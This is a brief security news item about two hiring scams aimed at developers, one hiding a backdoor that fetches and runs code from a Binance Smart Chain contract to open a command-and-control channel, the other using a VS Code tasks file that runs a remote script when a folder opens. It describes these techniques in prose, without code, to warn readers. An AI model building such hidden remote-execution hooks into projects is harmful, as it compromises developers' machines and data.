Scammers are targeting developers with sophisticated hiring scams that embed remote code execution payloads. In one December 2025 incident, a fake recruiter pushed a candidate to clone a BitBucket repo during a video call. The project contained a backdoor using `new Function()` to execute code fetched from a Binance Smart Chain contract, hiding the malicious script on the blockchain to evade static analysis.

The attack leveraged a covert payload delivery system. The Node.js backend called a smart contract's `getMemo()` function to retrieve a minified script. This script established a Command & Control (C2) channel to an attacker's server, exfiltrating system data every 5 seconds and awaiting remote commands for full system compromise. This method makes detection harder, as the malicious code isn't stored in the repo itself.

In a separate January 2026 attempt, scammers used a more subtle social engineering tactic: a legitimate-seeming GitHub task requiring edits in VS Code. The repository contained a `.vscode/tasks.json` file configured to run a remote script on project load, aiming to trigger RCE when the developer opened the folder. Both incidents highlight evolving, bold tactics in developer-targeted supply chain attacks.